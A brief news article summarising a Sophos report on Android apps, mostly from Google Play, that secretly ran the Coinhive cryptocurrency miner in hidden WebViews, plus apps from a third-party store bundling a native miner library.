This article is based on a 13-page statement announced last week by UK cyber-security firm Sophos. According to the business, its engineers found 19 Android applications that were uploaded and made accessible through the official Google Play Store.
Sophos says these apps were personally loading an instance of the Coinhive script externally without user knowledge.
A review of the malicious apps announced that app authors believed to be the same person/group hid the Coinhive JavaScript opening code inside HTML files in the apps’ /assets folder.
The malicious code executed when the user started the apps and the apps offered a WebView browser instance.
In some circumstances, if the apps did not justify opening a browser window, the WebView element was hidden from view and the possibility of the code that ran in the background.
In other instances, where the app was a news reader or tutorial viewer, the Coinhive in-browser JavaScript mining code ran along the app’s legitimate content while the user was using the app.
Sophos discovered this technique with 19 apps distributed via four developer accounts. Most apps barely made it to 100-500 installs, but one app extreme.action.wwe.wrestin was installed on between 100,000 and 500,000 devices.
The apps were uploaded to the Play Store around Christmas and Sophos researchers reported all apps to Google. All have been eliminated from the official Play Store at the time of writing.
A list of all the 19 Coinhive-laden apps is available on page 7 of the Sophos report, and users can review the list and see if they connected any of the apps on their devices.
On page 10, there’s another list of malicious apps, but these did not load the Coinhive JavaScript miner but instead installed the native cpuminer library for opening Bitcoin and Litecoin.
Sophos dubbed this malware CoinMiner and says it found it embedded in 10 apps made available through the coandroid.ru website, a third-party Android app store.
Take your time to comment on this article.